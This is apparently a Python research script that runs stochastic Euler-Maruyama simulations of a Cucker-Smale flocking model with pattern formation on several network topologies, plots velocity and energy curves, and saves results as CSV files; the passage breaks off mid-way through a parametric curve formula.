| 21 | 56 | 0.761905 | 18 | 147 | 6.055556 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.14966 | 147 | 6 | 57 | 24.5 | 0.872 | 0 | 0 | 0 | 0 | 0 | 0.251701 | 0.197279 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
6ad58fa69ec62fd766239b79d36be41ba2a0bd77 | 70,155 | py | Python | model/SDE/s.Imp-em-numpy-mp-net v2-average.py | neulbo-187/Cucker-Smale-Model | e77e8d804be440999c0e410a41364a992b8fcc75 | [
"MIT"
] | 2 | 2021-03-08T11:23:58.000Z | 2021-04-11T11:10:08.000Z | model/SDE/s.Imp-em-numpy-mp-net v2-average.py | neulbo-187/Cucker-Smale-Model | e77e8d804be440999c0e410a41364a992b8fcc75 | [
"MIT"
] | null | null | null | model/SDE/s.Imp-em-numpy-mp-net v2-average.py | neulbo-187/Cucker-Smale-Model | e77e8d804be440999c0e410a41364a992b8fcc75 | [
"MIT"
] | null | null | null |
#%%
import numpy as np
from scipy import integrate
import matplotlib.pyplot as plt
import matplotlib as mpl
import time
from matplotlib import animation, rc
from IPython.display import HTML
from matplotlib.ticker import ScalarFormatter
import matplotlib.gridspec as gridspec
from matplotlib.ticker import MaxNLocator
from mpl_toolkits.axes_grid1.inset_locator import inset_axes, mark_inset
import matplotlib.patches as mpatches
from mpl_toolkits.axes_grid1.inset_locator import (inset_axes, TransformedBbox,BboxPatch, BboxConnector)
from matplotlib.ticker import ScalarFormatter, FormatStrFormatter
import os
import glob
import pandas as pd
# numpy reference: http://taewan.kim/post/numpy_cheat_sheet/
def sto_ratio(start,end,below):
if np.min(Vcum[1:,start:end,0,0]) >= below :
ratio = abs(np.max(np.max(Vcum[1:,start:end,0,0],axis=0)-np.min(Vcum[1:,start:end,0,0],axis=0))/(np.max(Vcum[1:,start:end,0,0])-np.min(Vcum[1:,start:end,0,0])))
else :
ratio=0
return ratio
def makeplot():
global fig
# fig=plt.figure(constrained_layout=True,figsize=(10,5))
# spec=gridspec.GridSpec(ncols=9,nrows=6,figure=fig)
# ax=fig.add_subplot(spec[0:3,0:4])
# bx=fig.add_subplot(spec[0:3,4:8])
# bx_larged=fig.add_subplot(spec[0:3,8])
# dx=fig.add_subplot(spec[3:,6:])
## plot1 : graph of (v_t^1)_1 ... (v_t^n)_1 on trial =1
fig_size=(5.1,3.4)
fig=plt.figure(figsize=fig_size)
plt.plot(np.array(range(0,T))*h,[0 for tt in range(T)],linewidth=0.8,c='k')
for i in range(N):
plt.plot(np.array(range(0,T))*h,Vcum[1,:,i,0],alpha=0.6,linewidth=0.3)
axes = plt.axes()
axes.set_xlim(right=(T-2)*h,left=0)
axes.set_xlabel('t')
axes.set_ylabel('velocity',rotation=90)
saveplot(1,plotsave)
    ## plot2 : graph of (v_t^1)_1 on all trials
fig=plt.figure(figsize=fig_size)
    ## drawing a graph inside the plot: inset_axes, mark_inset / https://data-newbie.tistory.com/447
axes=plt.axes()
plt.plot(np.array(range(0,T))*h,[0 for tt in range(T)],linewidth=0.8,c='k')
for i in range(Trial) :
plt.plot(np.array(range(0,T))*h,Vcum[i+1,:,0,0],linewidth=0.3, alpha=0.6)
axes.set_xlim(right=(T-2)*h,left=0)
ax_max=max(np.max(Vcum[1:,:,0,0]),-1*np.min(Vcum[1:,:,0,0]))
if np.max(Vcum[1:,:,0,0]) > (-1)*np.min(Vcum[1:,:,0,0]):
# ax_cut=int(np.median(np.argmax(Vcum[1:,:,0,0],axis=1)))
cut_sign=1
plotlen=abs(np.min(Vcum[1:,:,0,0]))/(abs(np.max(Vcum[1:,:,0,0]))+abs(np.min(Vcum[1:,:,0,0])))
else :
# ax_cut=int(np.median(np.argmin(Vcum[1:,:,0,0],axis=1)))
cut_sign=-1
plotlen=abs(np.max(Vcum[1:,:,0,0]))/(abs(np.max(Vcum[1:,:,0,0]))+abs(np.min(Vcum[1:,:,0,0])))
# ax_ycut=np.max(Vcum[1:,ax_cut,0,0])
# ax_ycut2=np.min(Vcum[1:,ax_cut,0,0])
# # print(np.argmax(Vcum[1:,:,0,0],axis=1))
# # print(Vcum[1,:,0,0])
# # print(Vcum[2,:,0,0])
# # print(Vcum[3,:,0,0])
# print("ax_ycut : %f" %ax_ycut)
# print("ax_ycut2 : %f" %ax_ycut2)
# lar_len=min(12*(ax_ycut-ax_ycut2),abs(ax_ycut)*0.3)
# cutunit=3
# print("ax_cut : %d" %ax_cut)
# print("lar_len : %.2f" %lar_len)
# # select=0
# # bounded_l=ax_cut
# # bounded_r=T-1
# # ccut=ax_cut*3+50
# # while select==0 :
# # if cut_sign*(ax_ycut-np.mean(Vcum[:,ccut,0,0]))>lar_len :
# # bounded_r=ccut
# # ccut=int((bounded_l+ccut)/2)
# # if cut_sign*(ax_ycut-np.mean(Vcum[:,ccut,0,0]))<lar_len :
# # bounded_l=ccut
# # ccut=int((bounded_r+ccut)/2)
# # if bounded_r-bounded_l<cutunit:
# # select=1
# # ax_rightcut=min(int(ax_cut*4),bounded_r+1)
# # print("bound l : %d" %bounded_l)
# # print("bound r : %d" %bounded_r)
# # print("ax_rightcut : %d" %ax_rightcut)
# # select=0
# # bounded_l=0
# # bounded_r=ax_cut
# # ccut=int(ax_cut*0.5)
# # while select==0 :
# # if cut_sign*(ax_ycut-np.mean(Vcum[:,ccut,0,0]))>lar_len :
# # bounded_l=ccut
# # ccut=int((bounded_r+ccut)/2)
# # if cut_sign*(ax_ycut-np.mean(Vcum[:,ccut,0,0]))<lar_len :
# # bounded_r=ccut
# # ccut=int((bounded_l+ccut)/2)
# # if bounded_r-bounded_l<cutunit:
# # select=1
# # ax_leftcut=max(bounded_l,int(ax_cut-(ax_rightcut-ax_cut)),0)
# # print("bound l : %d" %bounded_l)
# # print("bound r : %d" %bounded_r)
# # print("ax_leftcut : %d" %ax_leftcut)
below=0.1
if T>900 :
enlarge_len=6
else :
enlarge_len=3
I_start=range(0,T-enlarge_len)
ratio=np.zeros(T-enlarge_len)
for i in I_start:
ratio[i] = sto_ratio(i,i+enlarge_len,below*ax_max)
ax_leftcut=np.argmax(ratio)
ax_rightcut=ax_leftcut+enlarge_len
print("ax_leftcut : %d" %ax_leftcut)
print("cut_sign : %d" %cut_sign)
print("plotlen : %.2f" %plotlen )
    ax_larged=inset_axes(axes,"100%","100%",bbox_to_anchor=[0.9-0.35,0.05+(0.1+plotlen)*(1+cut_sign)/2,0.08+0.35,0.8-plotlen+0.02*(cut_sign-1)/2],bbox_transform=axes.transAxes,borderpad=0) # x start position, y start position, width, height
for i in range(Trial) :
ax_larged.plot(np.array(range(ax_leftcut,ax_rightcut))*h,Vcum[i+1,ax_leftcut:ax_rightcut,0,0],linewidth=0.3, alpha=0.5)
# ax_larged.set_xticks([])
ax_larged.set_yticks([])
# ax_larged.set_ylim(bottom=np.max(Vcum[:,ax_leftcut:ax_rightcut,0,0])-lar_len*1.5,top=np.max(Vcum[:,ax_leftcut:ax_rightcut,0,0])+lar_len*0.05)
# ax_larged.set_ylim(bottom=np.max(Vcum[:,ax_cut,0,0])-lar_len*1.5,top=np.max(Vcum[:,ax_cut,0,0])+lar_len*0.05)
    my_mark_inset(axes,ax_larged,loc1a=2,loc1b=1,loc2a=3,loc2b=4,fc="none",ec="0.2",boxlw=0.6,connectlw=0.4) # corner codes 1-4 run counterclockwise from the upper right
axes.set_xlabel('t')
axes.set_ylabel('velocity',rotation=90)
saveplot(2,plotsave)
# plot3 : graph of E(Vnrm)
fig=plt.figure(constrained_layout=True,figsize=fig_size)
spec=gridspec.GridSpec(ncols=18,nrows=6,figure=fig)
EVnrm=np.mean(Vnrmcum[1:],axis=0)
EphE=np.mean(phEcum[1:],axis=0)
VVnrmcum=np.sort(Vnrmcum[1:],axis=0)
E0=EVnrm[0]+EphE[0]
SupVnrm=max(np.max(VVnrmcum[int(Trial*0.9),:]), np.max(EVnrm))
print (EVnrm)
scale_const=int(np.log10(E0))
scale=10**(-scale_const)
if E0>= SupVnrm:
cx_up=fig.add_subplot(spec[:2,:])
cx_down=fig.add_subplot(spec[2:,:])
# cx_down.plot(np.array(range(0,T))*h,[0 for tt in range(T)],linewidth=0.8,c='k')
cx_up.plot(np.array(range(0,T))*h,EVnrm*scale,linewidth=0.7,alpha=0.8,label=r'$\mathrm{\mathbb{E}}\Vert {\bf v}_t \Vert$')
cx_up.plot(np.array(range(0,T))*h,[E0*scale for tt in range(T)],linewidth=0.5,c='gold',label=r'$E_0$',ls='--')
cx_up.plot(np.array(range(0,T))*h,(E0-EphE)*scale, alpha=0.8,linewidth=0.7,c='forestgreen',label=r'$E_0-E^{\phi}_t$',ls='-.')
cx_up.plot(np.array(range(0,T))*h,(EphE+EVnrm)*scale, alpha=0.8,linewidth=0.5,c='firebrick',label=r'$E_t$',ls=':')
# cx_up.plot(range(0,T),medVnrm,c='paleturquoise',linewidth=0.7,alpha=0.7,label='median of ')
# cx_up.plot(range(0,T),VVnrmcum[int(Trial*0.9),:],c='deeppink',linewidth=0.5,alpha=0.7,label='90%')
cx_down.plot(np.array(range(0,T))*h,EVnrm*scale,linewidth=0.95,alpha=0.8,label=r'$\mathrm{\mathbb{E}}$')
cx_down.plot(np.array(range(0,T))*h,[E0*scale for tt in range(T)],linewidth=0.5,c='gold')
cx_down.plot(np.array(range(0,T))*h,(E0-EphE)*scale, alpha=0.8,linewidth=0.7,c='forestgreen',ls='-.')
cx_down.plot(np.array(range(0,T))*h,(EphE+EVnrm)*scale, alpha=0.8,linewidth=0.5,c='firebrick',ls=':')
# cx_down.plot(range(0,T),medVnrm,c='paleturquoise',linewidth=0.7,alpha=0.7,label='median')
# cx_down.plot(range(0,T),VVnrmcum[int(Trial*0.9),:],c='deeppink',linewidth=0.5,alpha=0.7,label='90%')
cx_up.set_ylim(0.9*E0*scale,E0*scale*1.01)
# cxcut=E0-min(EphE[np.argmax(VVnrmcum[int(Trial*0.9),:])], EphE[np.argmax(EVnrm)])
cx_top=SupVnrm*1.2*scale
# cx_bottom=min(np.min(VVnrmcum[0,:])*(-0.5),SupVnrm*(-0.05))*scale
cx_bottom=-0.001*2
cx_down.set_ylim(bottom=cx_bottom,top=cx_top)
# cx_down.set_ylim(top=cxcut*1.2)
cx_up.legend(fontsize=9.5*0.83,loc='best')
# cx_down.legend(fontsize=10,loc='best')
cx_up.spines['bottom'].set_visible(False)
cx_down.spines['top'].set_visible(False)
cx_up.xaxis.set_visible(False)
cx_down.xaxis.tick_bottom()
cx_up.set_xlim(right=(T-2)*h, left=-.01/9)
cx_down.set_xlim(right=(T-2)*h,left=-.01/9)
axes=cx_down
d = .004 # how big to make the diagonal lines in axes coordinates
# arguments to pass to plot, just so we don't keep repeating them
kwargs = dict(transform=cx_up.transAxes, color='k', clip_on=False,lw=0.8)
curvyline_x=np.linspace(-d,1+d,250)
curvyline_y=1.5*2*d*np.sin(2*np.pi/d*8*curvyline_x)
cx_up.plot(curvyline_x,curvyline_y, **kwargs) # top-left diagonal
kwargs.update(transform=cx_down.transAxes) # switch to the bottom axes
cx_down.plot(curvyline_x, 1+0.7*curvyline_y, **kwargs) # bottom-right diagonal
cx_up.annotate(r'$\times$10$^{%i}$' %(scale_const),xy=(0.003,0.83),xycoords='axes fraction')
# axis tick value format -> tried several approaches, ended up setting the exponent label manually
#https://stackoverflow.com/questions/39620700//positioning-the-exponent-of-tick-labels-when-using-scientific-notation-in-matplo
else :
cx=fig.add_subplot(spec[:,:])
# cx.set_title(r'$\mathrm{\mathbb{E}}||v(t)||^2$')
# cx.set_xlabel('K=%.2f,M=%.2f, sigma=%.2f' %(K,M,L))
cx.plot(np.array(range(0,T))*h,EVnrm,linewidth=0.7,alpha=0.8,label=r'$\mathrm{\mathbb{E}}||v||$')
cx.plot(np.array(range(0,T))*h,[E0 for tt in range(T)],linewidth=0.5,c='gold',label=r'$E_0$')
cx.plot(np.array(range(0,T))*h,E0-EphE, alpha=0.8,linewidth=0.5,c='forestgreen',label=r'$E_0-E^{\phi}_t$',ls='-.')
cx.plot(np.array(range(0,T))*h,EphE+EVnrm, alpha=0.8,linewidth=0.5,c='firebrick',label=r'$E_t$',ls=':')
# cx.plot(range(0,T),medVnrm,c='paleturquoise',linewidth=0.7,alpha=0.7,label='median')
# cx.plot(range(0,T),VVnrmcum[int(Trial*0.9),:],c='deeppink',linewidth=0.5,alpha=0.7,label='90%')
cx.legend(fontsize=10,loc='best')
cx_top=E0
cx_bottom=-0.001
axes=cx
plotlen=abs(np.min(EVnrm))/(E0+abs(np.min(EVnrm)))
cx_larged=inset_axes(axes,"100%","100%",bbox_to_anchor=[0.7,plotlen+0.15,0.28,0.8-plotlen],bbox_transform=axes.transAxes,borderpad=0) # bbox_to_anchor: x start, y start, width, height (axes coordinates)
cx_larged.plot(np.array(range(0,T))*h,EVnrm*scale,label=r'$\mathrm{\mathbb{E}}$')
cx_larged.plot(np.array(range(0,T))*h,(E0-EphE)*scale, alpha=0.8,linewidth=0.7,c='forestgreen',label=r'$E_0-E_\phi(t)$',ls='-.')
# cx_larged.plot(range(0,T),medVnrm,c='paleturquoise',linewidth=0.7,alpha=0.7)
# cx_larged.plot(range(0,T),VVnrmcum[int(Trial*0.9),:],c='deeppink',linewidth=0.5,alpha=0.7)
# cx_rightcut=np.argmax(EVnrm)
cx_rightcut=int(T/250*3)
# cx_larged.set_ylim(bottom=min(np.min(VVnrmcum[0,:])*(-0.5),SupVnrm*(-0.01)),top=SupVnrm*1.05)
# cx_larged.set_ylim(bottom=min(np.min(VVnrmcum[0:cx_rightcut])*(-0.5),np.max(EVnrm[0:cx_rightcut])*(-0.1)),top=(E0-np.min(EphE[:int(cx_rightcut*1.05)]))*0.65)
# cx_larged.set_ylim(bottom=max(cx_bottom,np.max(EVnrm[:int(cx_rightcut*1.05)+1])*(-0.025)*scale),top=min(scale*((E0-np.min(EphE[:int(cx_rightcut*1.05)+1]))*0.35+np.max(EVnrm[0:int(cx_rightcut*1.05)+1])*0.65),cx_top*0.9))
cx_larged.set_ylim(bottom=max(cx_bottom,np.min(EVnrm[:int(cx_rightcut*1.05)+1])*scale),top=min(scale*((E0-np.min(EphE[:int(cx_rightcut*1.05)+1]))*0.35+np.max(EVnrm[0:int(cx_rightcut*1.05)+1])*0.65),cx_top*0.9))
# cx_larged.set_xlim(left=cx_rightcut*(-0.05)*h,right=cx_rightcut*1.05*h)
cx_larged.set_xlim(left=0,right=cx_rightcut*1.05*h)
# cx_larged.legend(fontsize=5,loc='best')
cx_larged.set_yticks([])
my_mark_inset(axes,cx_larged,loc1a=2,loc1b=1,loc2a=3,loc2b=4,fc="none",ec="0.2",boxlw=0.4,connectlw=0.3) # corner codes 1-4 run counterclockwise from the upper right
axes.set_xlabel('t')
saveplot(3,plotsave)
## dx : graph of H(x,v)
fig=plt.figure(figsize=fig_size)
Hxv=np.mean(Xbnrmcum[1:]+Vnrmcum[1:],axis=0)
plt.plot(np.array(range(0,T))*h,Hxv)
axes=plt.axes()
axes.set_xlim(left=0,right=(T-2)*h)
axes.set_ylim(bottom=-0.001*2400)
axes.set_xlabel('t')
axes.set_yscale('log')
saveplot(4,plotsave)
#fig.tight_layout()
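# my_mark_inset: draw a rectangle on the parent axes marking the region shown in the inset,
# plus two connector lines between matching corners (a thin wrapper around mpl_toolkits'
# TransformedBbox / BboxPatch / BboxConnector).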
def my_mark_inset(parent_axes, inset_axes, loc1a=1, loc1b=1, loc2a=2, loc2b=2,boxlw=0.5,connectlw=0.5, **kwargs):
rect = TransformedBbox(inset_axes.viewLim, parent_axes.transData)
pp = BboxPatch(rect, fill=False,lw=boxlw, **kwargs)
parent_axes.add_patch(pp)
p1 = BboxConnector(inset_axes.bbox, rect, loc1=loc1a, loc2=loc1b,lw=connectlw, **kwargs)
inset_axes.add_patch(p1)
p1.set_clip_on(False)
p2 = BboxConnector(inset_axes.bbox, rect, loc1=loc2a, loc2=loc2b,lw=connectlw, **kwargs)
inset_axes.add_patch(p2)
p2.set_clip_on(False)
return pp, p1, p2
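# saveplot: when save != 0, write the current figure to a PDF (and additionally an EPS for plot 2)
# named from the model parameters; otherwise display it interactively.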
def saveplot(plotnum,save) :
if save!=0 :
# plt.savefig('graph_k%.2fm%.2fs%.4fnet%d.%d.%dN%dpsLB%.2fphLB%.2ftrial%dh%.5f-%d.pdf' %(K,M,L,nettype[0],nettype[1],nettype[2],N,psLB,phLB,Trial,h,plotnum),dpi=2000,bbox_inches='tight',pad_inches=0.02)
if plotnum == 2 :
plt.savefig('graph_k%.1fm%.1fs%.5fnet%d.%d.%dN%d-%d.eps' %(K,M,L,nettype[0],nettype[1],nettype[2],N,plotnum),dpi=3000,bbox_inches='tight',pad_inches=0.02)
plt.savefig('graph_k%.1fm%.1fs%.5fnet%d.%d.%dN%d-%d.pdf' %(K,M,L,nettype[0],nettype[1],nettype[2],N,plotnum),dpi=3000,bbox_inches='tight',pad_inches=0.02)
print("image saved_%d" %plotnum)
else :
plt.show()
def savedata(savemode) :
## savemode==1 : save just outlier data and initial setting
## savemode==2 : save all data and initial setting
## savemode==0 : don't save
if savemode==1 :
print("data reshaping")
selP = Pcum[selI,:,:,:].reshape(-1,T*N*2)
selV = Vcum[selI,:,:,:].reshape(-1,T*N*2)
selVnrm = Vnrmcum[selI,:]
selXbnrm = Xbnrmcum[selI,:]
seldB = dBcum[selI,:]
selP_df=pd.DataFrame(selP)
selV_df=pd.DataFrame(selV)
selVnrm_df=pd.DataFrame(selVnrm)
selXbnrm_df=pd.DataFrame(selXbnrm)
seldB_df=pd.DataFrame(seldB)
selcount_df=pd.DataFrame(selcount)
print("saving...")
selP_df.to_csv('selP_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
selV_df.to_csv('selV_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
selVnrm_df.to_csv('selVnrm_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
selXbnrm_df.to_csv('selXbnrm_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
seldB_df.to_csv('seldB_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
selcount_df.to_csv('selcount_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
elif savemode==2 :
print("data reshaping")
reP = Pcum.reshape(-1,T*N*2)
reV = Vcum.reshape(-1,T*N*2)
redB = dBcum.reshape(-1,T*2)
P_df=pd.DataFrame(reP)
V_df=pd.DataFrame(reV)
dBcum_df=pd.DataFrame(redB)
Vnrm_df=pd.DataFrame(Vnrmcum)
Xbnrm_df=pd.DataFrame(Xbnrmcum)
phE_df=pd.DataFrame(phEcum)
print("saving...")
P_df.to_csv('P_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
V_df.to_csv('V_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
Vnrm_df.to_csv('Vnrm_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
Xbnrm_df.to_csv('Xbnrm_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
phE_df.to_csv('phE_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
dBcum_df.to_csv('dBcum_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
# TODO: figure out how to store the settings as a DataFrame so that saving/loading is more convenient.
# dB, Pinit, Vinit, Z, A
if savemode!=0 :
variables=['N','alpha','beta','psLB','phLB','K','M','L','T','h','Trial','cut','nettype','curvetype','version']
setting={}
for index in variables:
setting[index]=globals()[index]
setting_df = pd.DataFrame(setting)
Pinit_df=pd.DataFrame(Pinit)
Vinit_df=pd.DataFrame(Vinit)
Z_df=pd.DataFrame(Z)
A_df=pd.DataFrame(A)
setting_df.to_csv('setting_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
Pinit_df.to_csv('Pinit_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
Vinit_df.to_csv('Vinit_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
Z_df.to_csv('Z_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
A_df.to_csv('A_%s_%s.csv' %(set_name,test_name),index=False,sep="\t")
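# makenet: build an N*N 0/1 adjacency matrix for the chosen topology. Based on the
# constructions below, the types appear to be:
#   0 - complete graph, 1 - path with a few hub nodes, 2 - path (line) graph,
#   3 - circulant graph (each node linked to the nodes +/-step away),
#   4 - path graph with every 10th node connected to all others, 5 - cycle (ring).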
def makenet(net_type):
A=np.zeros((N,N))
if net_type==0 :
A[:,:]=1
for i in range(N) :
A[i,i]=0
elif net_type==1 :
for i in range(N-1) :
A[i,i+1] = 1
A[0,1:N]=1
A[0:int(N/2)-1,int(N/2)-1]=1
A[int(N/2)-1,int(N/2):N]=1
A[:N-1,N-1]=1
A=A+A.T
elif net_type==2 :
for i in range(N-1) :
A[i,i+1] = 1
A=A+A.T
elif net_type==3 :
if N % 2 != 0 :
step=2
elif N % 4 == 0 :
step=N/2-1
else :
step=N/2-2
for i in range(N) :
A[i,int((i+step)%N)]=1
A[i,int((i-step)%N)]=1
elif net_type==4 :
for i in range(N-1) :
A[i,i+1] = 1
A=A+A.T
for i in range(int(N/10)) :
A[i*10,:]=1
A[:,i*10]=1
A[i*10,i*10]=0
elif net_type==5 :
for i in range(N-1) :
A[i,i+1] = 1
A[N-1,0]=1
A=A+A.T
return A
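# phiEest(ssq, b, LB): antiderivative of the weight psi evaluated at the squared distance ssq,
# i.e. integral_0^ssq [(1+r)^(-b) + LB] dr = ((1+ssq)^(1-b) - 1)/(1-b) + LB*ssq,
# used to accumulate the potential energy phE.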
def phiEest(ssq,b,LB):
phE=(np.power(1+ssq,1-b)-1)/(1-b)+ssq*LB
return phE
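# psi(s, b, LB): communication/interaction weight (1+s)^(-b) + LB, where s is a squared distance
# and LB is a lower bound that keeps the weight away from zero.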
def psi(s,b,LB):
a = np.power((1+s),-b) + LB
return a
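# csmpf(X, V): deterministic drift term for each agent -- velocity alignment with neighbours
# in A_ps (Cucker-Smale coupling, strength K) plus attraction toward the target pattern Z
# through neighbours in A_ph (strength M).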
def csmpf(X,V):
Kem=np.zeros((N,2))
for i in range(N):
J= A_ps[i,:] == 1
s=(np.power(X[i][0]-X[:,0],2)+np.power(X[i][1]-X[:,1],2))[J]
ps=psi(s,alpha,psLB)
a=np.sum((V[J]-V[i])*np.array([ps]).T,axis=0) * K
# To multiply each row of a matrix by a per-row scalar stored in an array, the dimensions must be broadcast-compatible:
# here we have an n*2 matrix and the scalars to multiply each row by are stored in ps,
# so a 1-D array of length n does not work; ps must be reshaped into an n*1 2-D array.
# a/=N
J= A_ph[i,:] == 1
u=np.array([0.0,0.0])
ss=(np.power(X[i][0]-Z[i][0]-X[:,0]+Z[:,0],2)+np.power(X[i][1]-Z[i][1]-X[:,1]+Z[:,1],2))[J]
pss=psi(ss,beta,phLB)
u=np.sum((X[J]-Z[J]-X[i]+Z[i])*np.array([pss]).T,axis=0) * M
a+=u
Kem[i]=a
Kem=np.nan_to_num(Kem)
return Kem
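# brown(V): diffusion coefficient of the noise -- L times the sum of velocity differences
# over the neighbours given by A_b.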
def brown(V) :
W=np.zeros((N,2))
for i in range(N) :
J= A_b[i,:]==1
W[i]=np.sum((V[J]-V[i]))*L
return W
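# dW(dt): a single Brownian increment ~ N(0, dt). The main loop draws its increments in
# set_dBcum instead, so this helper seems to be unused here.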
def dW(dt) :
return np.random.normal(0,np.sqrt(dt))
def theta(x):
a=np.heaviside(x,0)
return a
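# Curve(dom): sample the selected target curve at N points (2N when jump==1, since duplicate
# and zero points are filtered out afterwards) over the parameter interval [0, dom).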
def Curve (dom) :
num=N
if jump==1:
num*=2
t=np.linspace(0,dom,num,endpoint=False)
if curvename=='circle':
X = np.cos(t)
Y = np.sin(t)
elif curvename=='pi':
X = 17/31 *np.sin(235/57 - 32 *t) + 19/17 *np.sin(192/55 - 30 *t) + 47/32 *np.sin(69/25 - 29 *t) + 35/26 *np.sin(75/34 - 27 *t) + 6/31 *np.sin(23/10 - 26 *t) + 35/43 *np.sin(10/33 - 25 *t) + 126/43 *np.sin(421/158 - 24 *t) + 143/57 *np.sin(35/22 - 22 *t) + 106/27 *np.sin(84/29 - 21 *t) + 88/25 *np.sin(23/27 - 20 *t) + 74/27 *np.sin(53/22 - 19 *t) + 44/53 *np.sin(117/25 - 18 *t) + 126/25 *np.sin(88/49 - 17 *t) + 79/11 *np.sin(43/26 - 16 *t) + 43/12 *np.sin(41/17 - 15 *t) + 47/27 *np.sin(244/81 - 14 *t) + 8/5 *np.sin(79/19 - 13 *t) + 373/46 *np.sin(109/38 - 12 *t) + 1200/31 *np.sin(133/74 - 11 *t) + 67/24 *np.sin(157/61 - 10 *t) + 583/28 *np.sin(13/8 - 8 *t) + 772/35 *np.sin(59/16 - 7 *t) + 3705/46 *np.sin(117/50 - 6 *t) + 862/13 *np.sin(19/8 - 5 *t) + 6555/34 *np.sin(157/78 - 3 *t) + 6949/13 *np.sin(83/27 - t) - 6805/54 *np.sin(2 *t + 1/145) - 5207/37 *np.sin(4 *t + 49/74) - 1811/58 *np.sin(9 *t + 55/43) - 63/20 *np.sin(23 *t + 2/23) - 266/177 *np.sin(28 *t + 13/18) - 2/21 *np.sin(31 *t + 7/16)
Y = 70/37 *np.sin(65/32 - 32 *t) + 11/12 *np.sin(98/41 - 31 *t) + 26/29 *np.sin(35/12 - 30 *t) + 54/41 *np.sin(18/7 - 29 *t) + 177/71 *np.sin(51/19 - 27 *t) + 59/34 *np.sin(125/33 - 26 *t) + 49/29 *np.sin(18/11 - 25 *t) + 151/75 *np.sin(59/22 - 24 *t) + 52/9 *np.sin(118/45 - 22 *t) + 52/33 *np.sin(133/52 - 21 *t) + 37/45 *np.sin(61/14 - 20 *t) + 143/46 *np.sin(144/41 - 19 *t) + 254/47 *np.sin(19/52 - 18 *t) + 246/35 *np.sin(92/25 - 17 *t) + 722/111 *np.sin(176/67 - 16 *t) + 136/23 *np.sin(3/19 - 15 *t) + 273/25 *np.sin(32/21 - 13 *t) + 229/33 *np.sin(117/28 - 12 *t) + 19/4 *np.sin(43/11 - 11 *t) + 135/8 *np.sin(23/10 - 10 *t) + 205/6 *np.sin(33/23 - 8 *t) + 679/45 *np.sin(55/12 - 7 *t) + 101/8 *np.sin(11/12 - 6 *t) + 2760/59 *np.sin(40/11 - 5 *t) + 1207/18 *np.sin(21/23 - 4 *t) + 8566/27 *np.sin(39/28 - 3 *t) + 12334/29 *np.sin(47/37 - 2 *t) + 15410/39 *np.sin(185/41 - t) - 596/17 *np.sin(9 *t + 3/26) - 247/28 *np.sin(14 *t + 25/21) - 458/131 *np.sin(23 *t + 21/37) - 41/36 *np.sin(28 *t + 7/8)
elif curvename=='b.simpson':
X = ((-5/37 *np.sin(61/42 - 8 *t) - 112/41 *np.sin(36/23 - 7 *t) - 62/37 *np.sin(14/9 - 6 *t) - 31/7 *np.sin(69/44 - 5 *t) - 275/13 *np.sin(47/30 - 3 *t) - 23/38 *np.sin(48/31 - 2 *t) + 461/10 *np.sin(t + 107/68) + 8/23 *np.sin(4 *t + 179/38) - 2345/18) *np.heaviside(71 *np.pi - t,0.5) *np.heaviside(t - 67 *np.pi,0.5) + (-41/74 *np.sin(112/75 - 17 *t) - 274/37 *np.sin(17/11 - 11 *t) - 907/30 *np.sin(36/23 - 5 *t) + 623/15 *np.sin(t + 47/30) + 684/29 *np.sin(2 *t + 212/45) + 3864/25 *np.sin(3 *t + 63/40) + 1513/78 *np.sin(4 *t + 19/12) + 269/45 *np.sin(6 *t + 14/9) + 66/25 *np.sin(7 *t + 155/33) + 121/35 *np.sin(8 *t + 27/17) + 44/13 *np.sin(9 *t + 35/22) + 71/7 *np.sin(10 *t + 30/19) + 87/40 *np.sin(12 *t + 57/37) + 61/62 *np.sin(13 *t + 47/28) + 43/65 *np.sin(14 *t + 31/20) + 54/37 *np.sin(15 *t + 127/27) + 56/27 *np.sin(16 *t + 30/19) + 11843/35) *np.heaviside(67 *np.pi - t,0.5) *np.heaviside(t - 63 *np.pi,0.5) + (-119/55 *np.sin(65/43 - 13 *t) - 78/11 *np.sin(82/55 - 12 *t) - 25/31 *np.sin(36/23 - 11 *t) - 70/9 *np.sin(31/20 - 9 *t) - 707/65 *np.sin(47/30 - 7 *t) - 953/22 *np.sin(45/29 - 5 *t) + 962/15 *np.sin(t + 113/72) + 1091/30 *np.sin(2 *t + 212/45) + 3177/26 *np.sin(3 *t + 27/17) + 1685/22 *np.sin(4 *t + 43/27) + 143/27 *np.sin(6 *t + 49/32) + 203/27 *np.sin(8 *t + 27/17) + 411/37 *np.sin(10 *t + 50/31) + 65/27 *np.sin(14 *t + 33/20) + 8/19 *np.sin(15 *t + 13/7) + 3/11 *np.sin(16 *t + 43/33) - 11597/35) *np.heaviside(63 *np.pi - t,0.5) *np.heaviside(t - 59 *np.pi,0.5) + (-1/7 *np.sin(41/81 - 30 *t) - 8/27 *np.sin(3/28 - 28 *t) - 10/23 *np.sin(3/26 - 26 *t) + 2377/13 *np.sin(t + 33/28) + 43/15 *np.sin(2 *t + 26/7) + 131/18 *np.sin(3 *t + 3/25) + 45/41 *np.sin(4 *t + 105/32) + 43/14 *np.sin(5 *t + 87/23) + 135/136 *np.sin(6 *t + 51/20) + 51/14 *np.sin(7 *t + 118/43) + 19/18 *np.sin(8 *t + 23/18) + 49/23 *np.sin(9 *t + 25/12) + 14/19 *np.sin(10 *t + 63/55) + 54/49 *np.sin(11 *t + 68/41) + 32/37 